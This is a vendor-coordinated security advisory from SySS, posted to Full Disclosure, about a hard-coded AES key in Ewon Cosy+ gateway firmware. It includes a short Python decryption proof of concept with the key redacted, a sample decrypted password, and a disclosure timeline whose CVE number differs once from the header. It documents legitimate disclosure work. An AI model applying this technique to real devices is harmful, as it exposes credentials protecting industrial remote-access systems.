-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-032 Product: Ewon Cosy+ Manufacturer: HMS Industrial Networks AB Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3 Tested Version(s): Firmware Version: 21.2s7 Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2024-04-10 Solution Date: 2024-07-18 Public Disclosure: 2024-08-11 CVE Reference: CVE-2024-33895 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!" Due to the use of a hardcoded cryptographic key, an attacker is able to decrypt encrypted data and retrieve sensitive information. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Ewon Cosy+ stores sensitive data such as passwords in an encrypted format. These values are included, e.g., in configuration backups. However, a symmetric encryption algorithm (AES-CBC-256) with hardcoded and static cryptographic keys is used. Thus, an attacker is able to decrypt that data and retrieve sensitive information. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): By analyzing the ELF executable "ewon" of an Ewon Cosy+ in a disassembler and decompiler, e.g. Ghidra, the encryption mechanism could be reversed and the hardcoded cryptographic key could be extracted. Used encryption algorithm: AES in CBC mode with a key length of 256 bit A simple Python script was developed to decrypt encrypted values: ******************** import base64 import sys from Crypto.Cipher import AES from binascii import unhexlify def pad(text): padding_length = AES.block_size - (len(text) % AES.block_size) padded_text = text + bytes([padding_length] * padding_length) return padded_text, padding_length encoded_text = sys.argv[1] key_hex = "6367b0 [...]" # redacted iv_hex = "28c9 [...]" # redacted key = unhexlify(key_hex) iv = unhexlify(iv_hex) decoded_text = base64.b64decode(encoded_text[4:]) padded_text, padding_length = pad(decoded_text) cipher = AES.new(key, AES.MODE_CBC, iv) decrypted_text = cipher.decrypt(padded_text) print("Plaintext: {}".format( decrypted_text[1:][:-padding_length-2].decode('utf-8') )) **************** $> python3 decrypt_ewon_pwd.py "#_5_YARU3GSgNcElltjyMMqWfZwb" Plaintext: adm:123 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: According to the manufacturer note[4], the vulnerability was fixed with the firmware versions 21.2s10 and 22.1s3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-04: Vulnerability discovered 2024-04-10: Vulnerability reported to manufacturer 2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for a publication date for all findings 2024-04-12: Proposed dates for a discussion about publication 2024-04-19: Manufacturer sent a technical overview of planned remediation actions and details about the planned timeline 2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer 2024-05-31: Manufacturer informed that the fix is in completion stage and asked if the blog post[6] can be reviewed by HMS 2024-06-04: Proposed dates to review the blog post draft 2024-06-21: Inquiry about the status 2024-06-21: Received an out-of-office auto reply 2024-07-01: Inquiry about the status 2024-07-04: Inquiry about the status 2024-07-12: Inquiry about the status and letting the manufacturer know that the vulnerability will be published within a talk at DEF CON[7] in August 2024-07-12: Manufacturer responded that the fix is planned by the end of July; manufacturer asked again for reviewing the blog post draft 2024-07-12: Again confirmed reviewing the blog post is possible and asking for the sending of details 2024-07-17: Blog post provided to HMS 2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS 2024-07-23: Inquiry about the status 2024-07-23: Manufacturer reviewed the blog post and confirmed that a fix is provided 2024-07-29: Discussion with HMS about the blog post and final publication actions 2024-08-11: Vulnerability disclosed at DEF CON[7] 2024-08-11: Blog post published[6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Ewon Cosy+ product website https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet [2] SySS Security Advisory SYSS-2024-032 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-032.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Manufacturer note https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf [5] CVE-2024-33895 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33895 [6] Blog post https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/ [7] DEF CON talk https://defcon.org/html/defcon-32/dc-32-speakers.html#54521 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail:moritz.abrell () syss de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL:http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay420ACgkQrgyb+PE0 i1NNyw/9GzNMWrKeghrwqgcJ01f8QJGo1L3ObWscyiMXxqne6Zo8VyIefvGY97hb fZisL4BrzmK+NioLeP3SzM879yGbzU5dca7g5Cqf0qJh9mdU/s6tkgdK+Duz3QdZ 9XPV+ovSDGSDk953fVhHrKUdsns9hMnRIoMkfPxZUm+KWXRIwRguNxl2/q1xxgjt 2kqTldwgwgekKXXp+Uwt5Z8LUG0dU7pHHb3OCizJ81tOCHjwuJA3aUmyBachl4Vc Nw7GwByxoKLTTEfj2CWtkfC4u9UXHUQJBDl51+qRPIVkG2g0jTSQ2AEIubtmi7IA jA/8PK5QONh0GHptj2LzeTqlcEX7834uIE0gHrR5pkFJvgUWoNueEZ9FIHRNZPLX 9Lhu52uiKogX5BVYeRIkbHAxmgf/wojQ4AXE9BMvOgm0HSzjgIaVZ+cqNkMP1ey0 uDXPllHkWtA1IBeffhiVrfc11fLJJczkpN3hRevoa4D6hlNvOYrVUAY869vrJkA2 LHvFwLf1JDQaGiPCkglCcipjtXw+hqGE+zEYOWobXH4cIwdnPUG+VaAks9GcNEdN o6QVfnLTveo8e1u11z8ftguYthMbhOJxVWPBWJv6XhiCXEw8Gh/HonR6LfGQyRTe Fk+qtF1Mih2ZNKnW+XmHHCjtXGgiarfjExVFnhXHbrE8sOHv90I= =/d8q -----END PGP SIGNATURE-----
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/